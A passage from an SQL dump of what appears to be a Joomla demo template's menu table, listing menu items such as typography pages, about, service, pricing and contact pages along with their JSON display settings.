00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',26,31,0,'*',0),(546,'mainmenu','RTL Language','2012-03-30-09-21-8','','features/2012-03-30-09-21-07/2012-03-30-09-21-8','index.php?option=com_content&view=article&id=70&Itemid=469&direction=rtl','url',-2,545,3,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',27,28,0,'*',0),(547,'mainmenu','LTR Language','2012-03-30-09-22-59','','features/2012-03-30-09-21-07/2012-03-30-09-22-59','index.php?option=com_content&view=article&id=70&Itemid=469&direction=ltr','url',-2,545,3,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',29,30,0,'*',0),(548,'mainmenu','Mega Menu','2012-03-30-09-25-05','','features/2012-01-31-18-59-38/child-item-2/2012-03-30-09-25-05','index.php?option=com_content&view=featured&Itemid=101&menu=mega','url',-2,497,4,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',20,21,0,'*',0),(550,'mainmenu','Split Menu','2012-03-30-09-25-48','','features/2012-01-31-18-59-38/child-item-2/2012-03-30-09-25-48','index.php?option=com_content&view=featured&Itemid=101&menu=split','url',-2,497,4,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',22,23,0,'*',0),(551,'mainmenu','Offline Page','offline-page','','pages/offline-page','index.php?option=com_content&view=article&id=73','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',94,99,0,'*',0),(552,'mainmenu','Error page','2012-07-13-10-58-43','','pages/offline-page/2012-07-13-10-58-43','index.php?option=com_content&view=article&id=90','url',-2,551,3,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',95,96,0,'*',0),(553,'mainmenu','Offline Page','offline-page','','pages/offline-page/offline-page','index.php?option=com_content&view=article&id=73','component',-2,551,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',97,98,0,'*',0),(554,'main','com_joomlaupdate','com-joomlaupdate','','com-joomlaupdate','index.php?option=com_joomlaupdate','component',0,1,1,10067,0,'0000-00-00 00:00:00',0,1,'class:component',0,'',195,196,0,'',1),(555,'typography','Base Css','base-css','','base-css','index.php?Itemid=','alias',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"aliasoptions\":\"466\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',197,198,0,'*',0),(556,'typography','List','list','','list','index.php?option=com_content&view=article&id=75','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',199,200,0,'*',0),(557,'typography','Tables','tables','','tables','index.php?option=com_content&view=article&id=76','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',201,202,0,'*',0),(558,'typography','Forms','forms','','forms','index.php?option=com_content&view=article&id=77','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',203,204,0,'*',0),(559,'typography','Buttons','buttons','','buttons','index.php?option=com_content&view=article&id=78','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',205,206,0,'*',0),(560,'typography','Notice & Alerts','notice-alerts','','notice-alerts','index.php?option=com_content&view=article&id=79','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',207,208,0,'*',0),(561,'typography','Icons','icons','','icons','index.php?option=com_content&view=article&id=80','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',209,210,0,'*',0),(562,'typography','Thumbnail & Media','thumbnail-media','','thumbnail-media','index.php?option=com_content&view=article&id=81','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',211,212,0,'*',0),(563,'typography','Label & Badges','label-badges','','label-badges','index.php?option=com_content&view=article&id=82','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',213,214,0,'*',0),(564,'typography','Misc','misc','','misc','index.php?option=com_content&view=article&id=83','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',215,216,0,'*',0),(565,'mainmenu','Pages','pages','','pages','','separator',-2,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu_image\":\"\",\"menu_text\":1,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"icon-file\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',33,100,0,'*',0),(566,'mainmenu','Meet the team','meet-the-team','','pages/meet-the-team','index.php?option=com_content&view=article&id=85','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"Meet The Team\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',34,35,0,'*',0),(567,'mainmenu','About Us Page 1','about-us-page-1','','pages/about-us-page/about-us-page-1','index.php?option=com_content&view=article&id=84','component',-2,616,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"0\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"About Us Page 1\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',81,82,0,'*',0),(568,'mainmenu','About Us Page 2','about-us-page-2','','pages/about-us-page/about-us-page-2','index.php?option=com_content&view=article&id=84','component',-2,616,3,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',83,84,0,'*',0),(570,'mainmenu','Service Page','service-page','','pages/service-page','index.php?option=com_content&view=article&id=91','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"Service Page\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',64,65,0,'*',0),(571,'mainmenu','Pricing Tables','pricing-tables','','pages/pricing-tables','index.php?option=com_content&view=article&id=92','component',-2,565,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"Pricing Tables\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',66,67,0,'*',0),(572,'mainmenu','Single Contact','single-contact','','single-contact','index.php?option=com_contact&view=contact&id=1','component',-2,1,1,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"show_name\":\"0\",\"show_position\":\"0\",\"show_email\":\"0\",\"show_street_address\":\"0\",\"show_suburb\":\"0\",\"show_state\":\"0\",\"show_postcode\":\"0\",\"show_country\":\"0\",\"show_telephone\":\"0\",\"show_mobile\":\"0\",\"show_fax\":\"0\",\"show_webpage\":\"0\",\"show_misc\":\"0\",\"show_image\":\"0\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"0\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',217,218,0,'*',0),(573,'mainmenu','Single Contact (2)','single-contact-2','','single-contact-2','index.php?option=com_contact&view=contact&id=1','component',-2,1,1,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_cols\":\"1\",\"mega_group\":\"0\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_class\":\"\",\"mega_subcontent\":\"0\"}',219,220,0,'*',0),(574,'mainmenu','Contact Us Page 1','contact-us-page-1','','contact-page/contact-us-page-1','index.php?option=com_contact&view=contact&id=9','component',-2,619,2,8,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"Contact Us Page 